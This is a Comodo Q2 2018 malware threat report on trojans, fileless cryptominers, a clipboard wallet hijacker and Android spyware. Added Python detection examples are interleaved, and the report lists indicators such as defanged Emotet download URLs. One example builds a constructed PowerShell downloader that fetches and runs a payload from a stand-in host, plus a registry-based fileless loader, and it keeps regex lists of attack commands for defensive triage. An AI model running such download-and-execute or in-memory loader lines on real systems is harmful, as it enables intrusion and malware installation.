Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

5 MALWARE IN Q2 2018: THE BIG PICTURE 39
5.1 STRATEGIC THREAT: COMPUTER WORMS 40
5.1.1 Generic Worms 41
5.1.2 Net Worms 42
5.1.3 Email Worms 43
5.1.4 p2p Worms 44
5.1.5 IM Worms 45
5.2 HIGH THREAT MALWARE 46
5.2.1 Backdoors 47
5.2.2 Viruses 48
5.2.3 Trojans 49
5.2.4 Exploits 50
5.3 MEDIUM THREAT MALWARE 51
5.3.1 Constructor 52
5.3.2 Packers 53
5.3.3 Email Flooder 54
5.3.4 Virtual Tools 55
5.3.5 Jokes 56
5.4 LOW THREAT MALWARE: APPLICATIONS 57
5.4.1 Applications 58
5.4.2 Unwanted Applications 59
5.4.3 Unsafe Applications 60
6 VERTICAL ANALYSIS 61
7 GEOPOLITICAL INTELLIGENCE 63
7.1 USA 63
7.2 CHINA 64
7.3 SOUTH KOREA 65
7.4 NORTH KOREA 66
7.5 ARMENIA 67
7.6 BELARUS 68
7.7 IRAQ 69
7.8 UKRAINE 70
7.9 CROATIA 71
7.10 FINLAND, RUSSIA, USA 72
8 CONCLUSIONS 73

1 Executive summary

1.1 Overview

• In Q2, Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world.
• The malware was detected in 237 countries' top-level domains.
• Russia, Turkey and India were the countries with the highest number of worm infections.
• The United Kingdom had the highest proportion of detected backdoors.
• Ukraine and Russia were the most common countries of detection for viruses.
• Germany was the #1 country hit by trojans.

1.2 New Trends

1.2.1 Trojans jumped to the top of the malware list

The most dangerous sign is the unfolding merger of trojans and phishing emails, which amplifies the spread of the malware. Attackers use trojans to deliver other malware, and the trojan surge accompanies a significant increase in other malware infections. Users therefore face a new challenge: massive attacks implanting hidden malware with long-term activity.

1.2.2 Cryptominers evolved into multifunctional malware

Cryptomining decreased in quantity but grew in harmful capability. As Q2 events demonstrated, this genre of malware is actively developing in two directions: better hiding and stronger persistence. Cryptominers have gained new features that let them fight antivirus software and root deeply into users' systems.

1.2.3 Android malware skyrocketed in variety

In Q2, Comodo Threat Research Labs observed a huge spike in Android malware development. Android devices have become attractive targets for cybercriminals because a modern mobile device is a treasure trove of data. Spyware leads among Android malware types. Like real-world spies, Android spyware constantly changes its guise and its methods of avoiding detection, and its harmful potential rises with every new version.

1.2.4 Geopolitical intelligence

Cyberattacks and malware spikes often correlate with significant events in world politics. The appointments of the US Secretary of State and CIA Director, Armenia's political revolution, the Donald Trump and Vladimir Putin summit in Helsinki, the Champions League final in Ukraine, US-South Korean joint military exercises, the anniversary of the 1989 Tiananmen Square protests and other events during Q2 2018 demonstrate such correlations.

2 Trojans going on the offensive to hunt for confidential data

The second quarter of 2018 brought a sudden change in the malware competition. Trojans squeezed out other malware types and jumped to the top of the charts. Having gained the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape, and their rise forces cybersecurity departments and individual users to update their defensive tactics.

Malware Distribution by Type

Why are these changes inevitable?

Trojans are a special kind of malware. Their distinguishing feature is universality: they support a wide diversity of attacks, from stealing data to implanting ransomware, adware or cryptominers, or even crashing systems outright.

Another special feature of trojans is covert activity. The owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.

Hence the need for a new approach to defense. Let's take a closer look at the most active players on the trojan team to understand what harm they can do to your computers if they sneak inside.

Distribution of top 30 Malware Families

In this list of the top 30 malware families, which trojans overwhelmingly dominate, you can find samples exhibiting diverse types of malicious activity.

For example, the leader of Q2 attacks, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. The downloaded malware can be of any type.

Number two in the list, TrojWare.JS.Clickjack, exhibits different behavior: it makes users unintentionally click on hidden links. The link can be just another advertisement, or it can lead to a malicious website that infects users with other types of malware.

TrojWare.JS.Faceliker clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites; then, when infected users open Facebook, Faceliker hijacks their “likes.”

TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' command-and-control server.

TrojWare.Win32.Injector uses process injection as its main technique for taking malicious actions; the technique is mostly used to bypass security products.

TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via phishing email.

Such diversity of malicious activity, together with their special ability to hide, has always made trojans among the hardest malware to fight. But in Q2 2018 they became even more sophisticated and dangerous, and Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.

First among these trends is the explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website that lured victims into supplying their credentials. Today, phishing emails have become a potent delivery mechanism for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data, which they then send to cybercriminals' servers.

The accompanying graph shows the most popular malware spread via email. Note that 18 of the 20 families are trojans.

Distribution of Phishing Families of Malware

2.1 The Most Widespread Trojan

The most widely proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.

If a user takes the bait and runs the file, it copies itself to %APPDATA% as D5E2DEE36C7A.exe, launches itself from that location and starts to gather the credentials present on the system.

It collects credentials and private data from known browsers, email clients, FTP clients, and WebDAV and SCP clients. It then sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp (the URL's separators were lost in extraction).

The phishing email

2.2 PowerShell-based attack with Emotet

Another alarming trend relates to the malware itself rather than its delivery method. Increasingly, cybercriminals do not rely on native Windows .exe files but instead use PowerShell scripts and other legitimate software to infect a computer. Attacks of this type are much harder to detect with antivirus tools.

Emotet is one of the most aggressive trojans currently active. Spread through various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email imitating a message from the IRS about a “Tax Account Transcript.” Notice that the message is written in a cheerful manner to inspire the user's trust.

The phishing email

The attached file is an Office document containing a malicious macro (VBA script). Since a freshly installed Microsoft Office does not allow such scripts to run by default, the attackers added a decoy prompt to convince victims to enable script execution.

The decoy prompt that convinces victims to enable script execution

The purpose of the macro is to launch PowerShell.

The PowerShell stage downloads the malware to a temporary folder and executes a binary fetched from one of several hosts (URL separators were lost in extraction): hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r, hxxpairmaxxrswIdY.

At the time of writing, only the thecyberconxion.com host was still serving a malware binary (SHA1: 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service named “lanesviewer” to ensure persistence.

The malware creates the “lanesviewer” service to ensure persistence

After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' command-and-control server.

The next example is even more cunning, because it infects computers through popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a long and varied history of use in cyberattacks. What is most striking is that it is based on legitimate software, Ammyy Admin; its history is a vivid example of how malicious hackers turn a legitimate tool into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals, and unsurprisingly perpetrators adopted it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin installer with a bundle containing malware, so that every user who downloaded Ammyy Admin was covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and the cycle repeated itself.

As the diagram shows, Ammyy Admin was used to spread many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 and takes its name from the leaked source code of Ammyy Admin version 3. Flawed Ammyy RAT gives attackers functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware and so on.

The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. Especially noteworthy is that this trick, too, relies on legitimate software, this time Microsoft Excel.

Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are Excel Internet Query files: short text files holding a URL and related parameters that tell Excel to fetch data from the web. Excel places whatever the remote server returns into the worksheet, and if that content contains a formula, Excel will offer to execute it after a security prompt. An IQY can therefore pull content down and run it directly inside Excel.

The malicious IQY contained a URL that kicked off a chain of malicious files, ending with Flawed Ammyy being downloaded and run via Windows PowerShell.
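The IQY format is simple enough to triage at a mail gateway or in a sandbox before Excel ever sees the file. The Python below is an added example, not code from the Comodo report or from Microsoft: it parses the mandatory lines of a WEB query file and flags the traits that made the Flawed Ammyy lures dangerous. The allow-listed host, the sample files and the IP address in them are constructed for this example.

```python
"""Triage an Excel Internet Query (.iqy) attachment before a user opens it.

Added example, not code from the Comodo report. An IQY file is plain text:
line 1 is the query type ("WEB"), line 2 the format version ("1"), line 3 the
URL that Excel will fetch, followed by optional key=value settings. The sample
files and the allow-listed host below are constructed for this example.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Hosts an organisation legitimately pulls query data from (placeholder for the example).
ALLOWED_HOSTS = {"reports.intranet.example"}


@dataclass
class IqyVerdict:
    url: Optional[str]
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def parse_iqy(text: str) -> Dict[str, object]:
    """Split an IQY file into its type, version, URL and trailing settings."""
    lines = [ln.strip() for ln in text.splitlines()]
    lines = [ln for ln in lines if ln]  # blank lines are legal padding
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query file")
    settings: Dict[str, str] = {}
    for ln in lines[3:]:
        key, _, value = ln.partition("=")
        settings[key.strip().lower()] = value.strip()
    return {"type": lines[0], "version": lines[1], "url": lines[2], "settings": settings}


def triage_iqy(text: str) -> IqyVerdict:
    """Flag what made the Flawed Ammyy lures dangerous: an external or
    bare-IP host that the user's Excel will connect to on open."""
    try:
        query = parse_iqy(text)
    except ValueError as exc:
        return IqyVerdict(None, [str(exc)])
    url = str(query["url"])
    verdict = IqyVerdict(url)
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    if parts.scheme.lower() not in ("http", "https"):
        verdict.findings.append(f"unexpected scheme {parts.scheme!r}")
    if not host:
        verdict.findings.append("no host in query URL")
    elif host not in ALLOWED_HOSTS:
        verdict.findings.append(f"external host {host}")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        verdict.findings.append("host is a bare IP address")
    # Excel's dynamic-parameter syntax ["name","prompt"] lets the file prompt the
    # user and splice the answer into the request; lures use it to look interactive.
    if "[" in url and "]" in url:
        verdict.findings.append("URL contains a dynamic parameter prompt")
    return verdict


# Constructed samples. 198.51.100.0/24 is a documentation range, not a real host.
LURE_IQY = "WEB\n1\nhttp://198.51.100.7/Ld3q\n\nSelection=EntirePage\nFormatting=None\n"
BENIGN_IQY = "WEB\n1\nhttps://reports.intranet.example/sales.aspx\n\nSelection=1\n"

if __name__ == "__main__":
    for name, sample in (("lure", LURE_IQY), ("benign", BENIGN_IQY)):
        v = triage_iqy(sample)
        print(f"{name}: url={v.url} suspicious={v.suspicious} findings={v.findings}")
```

Because Excel will connect to whatever URL line 3 names, the practical controls are to quarantine .iqy attachments at the gateway and to block untrusted query files through Excel's Trust Center external-content settings; the triage above tells you which quarantined files deserve a closer look.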

Malware runs PowerShell

Thus, in this case, machines face extremely dangerous and potent malware that is built from and delivered via legitimate software. This makes it much harder for antivirus software to detect the attack.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably shift attack vectors toward covert theft and the manipulation of users: a real gift for cybercriminals and a nightmare for users.

Trojans buy attackers time. Because the malware acts covertly, cybercriminals have more than enough time to use stolen data to their advantage. In many cases the attack is discovered only when it is too late, after money has been withdrawn from a bank account or confidential data has been published. The merger of trojans as payloads and phishing emails as the means of delivery observed during Q2 will bring a surge in such attacks and victims, and the use of legitimate tools such as PowerShell to run malware will amplify the number of victims further, because such attacks are much harder for antivirus products to detect.

To fight these attacks, cybersecurity departments need to rearrange their security measures around the trends above. Combining the best malware detection tools with data protection methods built on defense-in-depth principles offers the most promising solution.

Chart: The growth of Flawed Ammyy attacks for Q2 (detections by month). Apr: 43,188; May: 46,382; Jun: 48,881.

3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and re-equipping to fight more efficiently. Cryptominers are developing quickly and gaining new, dangerous abilities.

Earlier cryptomining examples could only use the infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: cryptominers did not steal information or destroy data like other malware but merely consumed CPU resources. Moreover, they typically did not employ strong obfuscation and could be discovered and deleted easily.

But Q2 events clearly showed that the situation has radically changed.

New cryptominer samples detected by Comodo malware analysts exhibit abilities far beyond those needed merely to mine cryptocurrency. These samples show cryptominers transforming into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight antimalware tools: they can camouflage themselves, kill competing cryptominers and even crash the user's system when an attempt is made to remove them.

3.1 BadShell attacks enterprises

Fileless malware is a next-generation threat compared with traditional infection via .exe files. File-based malware resides on disk, which makes it easier to detect. Fileless malware is different: as the name suggests, it is malicious code injected into legitimate OS processes. It need not be installed on the victim machine but runs only in memory, which makes it much harder for antivirus products to detect.

Usually such malware is spread via malicious ad banners. Clicking a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. Because many antivirus tools cannot detect it, users remain unaware that they are infected. Not surprisingly, its use by cybercriminals is increasing.

Last quarter, Comodo Threat Research Labs analysts encountered exactly such an attack. A company with several thousand endpoints was compromised by fileless malware. When its legacy security software failed to protect it, the company turned to Comodo Threat Research Labs for assistance.

Comodo analysts found that the malware was a cryptominer that abused legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.

Decoding the PowerShell arguments reveals the malicious code stored in the registry. The PowerShell script injects this code into an existing running process.
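Both PowerShell-based chains in this report end the same way: Emotet's macro launches PowerShell to download and run a binary (section 2.2), and BadShell uses it to pull a payload out of the registry and inject it into a running process. The triage function below is an added example, not code from the Comodo report: it takes a process command line from endpoint telemetry, decodes any -EncodedCommand argument and tags the behaviours the two chains exhibit. The sample command lines, the registry path and the URL in them are constructed placeholders, not observed indicators.

```python
"""Recover and tag the script behind a PowerShell command line.

Added example, not code from the Comodo report. Given a process command line
such as  powershell.exe -nop -w hidden -enc <base64>  it decodes the
-EncodedCommand argument (Base64 over UTF-16LE text) and tags the behaviours
described for Emotet (download a binary, launch it) and BadShell (read a
payload from the registry, Base64-decode it, run it in memory). The sample
command lines, registry path and URL are constructed placeholders.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional, Set

# Behaviour tags and the regexes that raise them, matched against the raw
# command line plus the decoded script.
INDICATORS = {
    "registry_read": r"(?i)Get-ItemProperty(?:Value)?\b[^\n]*?(?:HK(?:LM|CU)|Registry::)",
    "base64_decode": r"(?i)FromBase64String",
    "in_memory_exec": r"(?i)\bi(?:ex|nvoke-expression)\b|Reflection\.Assembly\]::Load|VirtualAlloc",
    "download": r"(?i)Net\.WebClient|Download(?:File|String|Data)\(|Invoke-WebRequest|\biwr\b",
    "launch": r"(?i)Start-Process|\bsaps\b|Invoke-Item|\bcmd(?:\.exe)?\s*/c",
    "persistence": r"(?i)schtasks|Register-ScheduledTask|New-Service|\bsc(?:\.exe)?\s+create",
    "evasion": r"(?i)-nop(?:rofile)?\b|-noni(?:nteractive)?\b|-w\w*\s+hidden|-e[px]\w*\s+bypass",
}


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the Base64 argument of -EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
    which is what most loaders use, so match on prefix rather than exact name.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        name = tok[1:].lower()
        if name and "encodedcommand".startswith(name):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are UTF-16LE text, Base64-encoded."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here to build the samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


@dataclass
class PsVerdict:
    cmdline: str
    decoded: Optional[str]
    tags: Set[str] = field(default_factory=set)

    @property
    def fileless_loader(self) -> bool:
        """BadShell pattern: the payload lives in the registry and never touches disk."""
        return {"registry_read", "base64_decode", "in_memory_exec"} <= self.tags

    @property
    def downloader(self) -> bool:
        """Emotet pattern: fetch a binary, then start it."""
        return {"download", "launch"} <= self.tags


def triage_powershell(cmdline: str) -> PsVerdict:
    decoded = None
    b64 = extract_encoded_command(cmdline)
    if b64 is not None:
        try:
            decoded = decode_encoded_command(b64)
        except (ValueError, UnicodeDecodeError):
            decoded = None  # not valid Base64/UTF-16; still tag the raw line
    verdict = PsVerdict(cmdline, decoded)
    haystack = cmdline + "\n" + (decoded or "")
    for tag, pattern in INDICATORS.items():
        if re.search(pattern, haystack):
            verdict.tags.add(tag)
    return verdict


# Constructed samples. The registry path and the URL are placeholders.
FILELESS_SCRIPT = (
    "$b = (Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Example\\Cache').Blob;"
    "$a = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($b));"
    "$a.EntryPoint.Invoke($null, @())"
)
DOWNLOADER_SCRIPT = (
    "$w = New-Object Net.WebClient;"
    "$w.DownloadFile('http://loader.example/payload.exe', \"$env:TEMP\\svc.exe\");"
    "Start-Process \"$env:TEMP\\svc.exe\""
)
FILELESS_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_command(FILELESS_SCRIPT)
DOWNLOADER_CMDLINE = "powershell -ExecutionPolicy Bypass -e " + encode_command(DOWNLOADER_SCRIPT)
BENIGN_CMDLINE = "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"

if __name__ == "__main__":
    for line in (FILELESS_CMDLINE, DOWNLOADER_CMDLINE, BENIGN_CMDLINE):
        v = triage_powershell(line)
        print(f"fileless={v.fileless_loader} downloader={v.downloader} tags={sorted(v.tags)}")
```

Run it over process-creation events that carry the full command line (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled). The fileless_loader combination is the BadShell signature and downloader the Emotet one; neither depends on a file hash. -EncodedCommand is only one way to hide a script: a loader can also build the script with string concatenation under -Command or read it from a file, which the tagging of the raw command line only partly covers.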

BadShell at work

The malicious code in the registry

This emergency clearly demonstrates how dangerous cryptominer activity can be. Imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took control of the situation and cleaned the infection from every affected computer, but the company's financial losses were, of course, irreversible.

Invisibility to antivirus software and persistence in the system are a cryptominer's most important attributes, because the longer it runs on the infected system, the more it earns the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into the attacker's slave.

3.2 WinstarNssmMiner: a system killer

Like other cryptominers, WinstarNssmMiner exists to steal computer resources to mine cryptocurrency for cybercriminals. But it has a special feature: it roots itself into the system so deeply that it becomes unremovable. Attempting to kill it kills the target system.

The secret of WinstarNssmMiner's persistence lies in how it infects the victim's computer. It consists of two components injected into two svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes carry the system attribute “critical process” (the per-process flag Windows exposes as BreakOnTermination), meaning that terminating either of them crashes the system and leaves the user with a blue screen.

WinstarNssmMiner spreading around the world

Cryptominers can kill not only the victim's system but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for other cryptomalware. If an “alien” cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads the CoinMiner build for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an “AMDDriver64” process.

The code downloads CoinMiner and checks whether a miner is already running

The malware maintains two lists, named $malwares and $malwares2, holding the names of the processes it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner takes sole possession of the victim's computer and uses its resources to mine cryptocurrency.

Some cryptominers earned the spotlight of the mass media and security researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide, and CoinHive is the clearest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into your website, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily spotted.

The CoinHive script

After many publications on the subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. In the second quarter, perpetrators found a way around this obstacle: they now use a sneaky trick to camouflage CoinHive's presence with URL shorteners.

As a result the malicious code on a webpage looks like this

The obfuscated malicious code on a webpage

If we decode the string we encounter an iframe

The iframe loads the URL shortener

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive:

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but does not find any sign of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
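A defender-side check for the trick described above, added here as an example (not code from the Comodo report or from CoinHive): it decodes base64 blobs found in a page, parses any iframe they hide, and flags tiny frames pointing at the cnhv.co shortener or the CoinHive host. The sample page is constructed; coinhive.com as the script host is an assumption.

```python
"""Find CoinHive loaders hidden behind a base64 blob and a 1x1 iframe.

Added example, not code from the Comodo report or from CoinHive. The sample page
below is constructed; the cnhv.co shortener and the 1x1 iframe sizing come from
the report's description, and coinhive.com as the script host is an assumption.
"""
import base64
import re
from html.parser import HTMLParser

# Hosts that identify a CoinHive loader: the cnhv.co shortener named in the report
# and (assumed) the CoinHive script host itself.
SUSPECT_HOSTS = ("cnhv.co", "coinhive.com")

# A run of base64 characters long enough to hold an <iframe ...> tag.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> seen while parsing."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def decode_blobs(html):
    """Yield the decoded text of every base64-looking blob embedded in the page."""
    for match in B64_BLOB.finditer(html):
        try:
            yield base64.b64decode(match.group(0), validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64 (binascii.Error is a ValueError)
            continue


def is_tiny(frame):
    """True when the frame is sized 0x0 or 1x1, i.e. meant to be invisible."""
    return (frame.get("width", "").strip() in ("0", "1")
            and frame.get("height", "").strip() in ("0", "1"))


def find_hidden_miner_iframes(html):
    """Return one finding per suspicious iframe, whether it is in the plain HTML
    or only appears after decoding a base64 blob (decoded=True)."""
    layers = [(False, html)] + [(True, text) for text in decode_blobs(html)]
    findings = []
    for decoded, text in layers:
        parser = IframeCollector()
        parser.feed(text)
        for frame in parser.iframes:
            src = frame.get("src", "")
            suspect_host = any(host in src for host in SUSPECT_HOSTS)
            if suspect_host or is_tiny(frame):
                findings.append({"src": src, "tiny": is_tiny(frame),
                                 "suspect_host": suspect_host, "decoded": decoded})
    return findings


# Constructed sample: the loader hides the iframe inside a base64 string that the
# page decodes with atob() at runtime, so that "view source" shows no miner.
HIDDEN_IFRAME = b'<iframe src="https://cnhv.co/EXAMPLE-SHORTLINK" width="1" height="1"></iframe>'
SAMPLE_PAGE = ('<html><body><h1>Free wallpapers</h1><script>document.write(atob("'
               + base64.b64encode(HIDDEN_IFRAME).decode("ascii")
               + '"));</script></body></html>')

# A normal embed: visible size, unrelated host, so it must not be flagged.
CLEAN_PAGE = '<iframe src="https://www.example.com/player" width="560" height="315"></iframe>'

if __name__ == "__main__":
    for finding in find_hidden_miner_iframes(SAMPLE_PAGE):
        print(finding)
```

The same scan works on a page fetched from a site under your own administration; flagged frames that were only visible after decoding are the ones a "view source" check would miss.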

The next malware in the row does not mine cryptocurrency but steals it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a weakness they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
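The swap described above, as an added example (not code from the Comodo report or from the malware): a defender-side clipboard monitor that remembers what the user copied and flags a poll that finds a different wallet address. The event log is constructed from the report's two addresses; the address pattern is the legacy Bitcoin format, and the clipboard reads are simulated so the logic runs offline.

```python
"""Spot a clipboard wallet-address swap of the kind described above.

Added example, not code from the Comodo report or from the malware. The event log
is constructed; the two addresses are the ones quoted in the report. A real
monitor would read the clipboard with a library such as pyperclip; here the
reads are simulated so the logic runs offline.
"""
import re

# Shape of a legacy Bitcoin address: P2PKH starts with "1", P2SH with "3",
# followed by 25 to 34 Base58 characters (no 0, O, I or l).
BTC_ADDRESS = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")


def is_wallet_address(text):
    """True when the clipboard text looks like a Bitcoin wallet address."""
    return bool(BTC_ADDRESS.match(text.strip()))


def detect_clipboard_swaps(events):
    """Walk clipboard events and report address replacements.

    events: iterable of (source, text) where source is "copy" for a copy the
    user made (e.g. Ctrl+C observed by a keyboard hook) and "read" for a
    periodic poll of the clipboard. A read that holds a different wallet
    address than the user last copied, with no copy in between, is exactly
    what a hijacker leaves behind. Returns a list of (copied, replaced_with).
    """
    alerts = []
    last_copied = None
    for source, text in events:
        if source == "copy":
            last_copied = text
        elif source == "read":
            if (last_copied is not None
                    and is_wallet_address(last_copied)
                    and is_wallet_address(text)
                    and text != last_copied):
                alerts.append((last_copied, text))
                last_copied = text  # report each swap once, not on every poll
    return alerts


# Constructed event log replaying the report's example: the user copies the
# 3FC7... address, and the next poll finds the attacker's 1HMF... address instead.
SAMPLE_EVENTS = [
    ("copy", "meeting notes for Monday"),
    ("read", "meeting notes for Monday"),
    ("copy", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ("read", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
    ("read", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
    ("copy", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),  # user re-copies: not a swap
    ("read", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
]

if __name__ == "__main__":
    for copied, replaced in detect_clipboard_swaps(SAMPLE_EVENTS):
        print(f"clipboard swap: {copied} -> {replaced}")
```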


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.

4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks in the graph.

The digital spooks

